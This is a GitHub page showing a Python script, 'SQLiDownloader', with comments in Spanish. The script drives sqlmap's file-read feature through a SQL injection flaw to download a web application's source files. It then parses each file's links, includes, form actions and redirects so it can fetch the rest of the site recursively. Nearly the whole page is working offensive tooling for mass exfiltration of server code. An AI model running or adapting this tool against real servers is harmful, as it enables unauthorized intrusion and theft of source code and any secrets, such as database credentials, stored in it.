-
Notifications
You must be signed in to change notification settings - Fork 3
/
sqlidownloader.py
executable file
·100 lines (77 loc) · 2.5 KB
/
sqlidownloader.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
#! /usr/bin/python
import commands
import os
import re
import sys
print("""
SQLiDownloader v0.1 - Automatic file downloader tool via SQLi
escrito por Victor Herrera
www.zeroday.cl
""")
if len(sys.argv) < 4:
print("""
Parametros incorrectos:
./sqlidownloader.py [SQLMAP URL and PARAMS] [output-folder] [web_document_root_path] [first_file_or_index_file]
Example
./sqlidownloader.py "-u http://server/noticias.php?id=2 --dbms=mysql -p id" prueba "/var/www/sqliweb" "/var/www/sqliweb/noticias.php"
""")
sys.exit()
sqlmap_arg = sys.argv[1]
dirw = sys.argv[2]
droot = sys.argv[3]
files = sys.argv[4].split()
def download_file(f):
sqlcmd = "sqlmap " + sqlmap_arg + " --file-read=" + f + " --batch"
status, ret = commands.getstatusoutput(sqlcmd)
patron = re.compile("files saved to.*\n\[\*\] (.*) \(same.*")
filed = patron.findall(ret)
if len(filed) > 0:
p, a = os.path.split(f)
p += "/"
if len(p.replace(droot,"")) > 0:
dest = "output/" + dirw + "/" + p.replace(droot,"") + a
else:
dest = "output/" + dirw + "/" + a
os.rename(filed[0],dest)
print("[+] Descargado el archivo " + f + "")
return dest
#########################################################################################################
print("[*] Iniciando descarga")
if os.path.isdir("output"):
print ("[+] Directorio /output creado")
else:
os.makedirs("output")
print ("[+] Directorio /output creado")
if os.path.isdir("output/" + dirw):
print ("[+] Directorio /output/" + dirw + " creado")
else:
os.makedirs("output/" + dirw)
print ("[+] Directorio /output/" + dirw + " creado")
while (files):
nf = download_file(files.pop())
if nf:
try:
fo = open(nf,"r")
fc = fo.read()
fo.close()
except IOError:
fc = ""
print ("[*] Error: no se puede abrir el archivo: " + nf)
patron = re.compile("a.*href=['\"](.*\.php?)[\?\"']|require.*['\"](.*?)[\"']|include.*['\"](.*?)[\"']|form.*action=['\"](.*?)[\"']|header\(\"[L,l]ocation:\s(.*?)[\"']")
fs = patron.findall(fc)
for j in fs:
for i in j:
if len(i) > 0:
da = os.path.split(os.path.abspath(nf))[0]
df = os.path.split(i)[0]
dr = os.path.join(da, i)
dn = droot + os.path.dirname(nf).replace("output/" + dirw,"") + "/" + i
if not os.path.isfile(dr):
files.append(dn)
if len(df) > 0:
try:
os.makedirs(os.path.join(da, df))
except OSError:
pass
print("[-] Agregado " + dn + " a la cola...")
print "[*] Descarga masiva finalizada en /output/" + dirw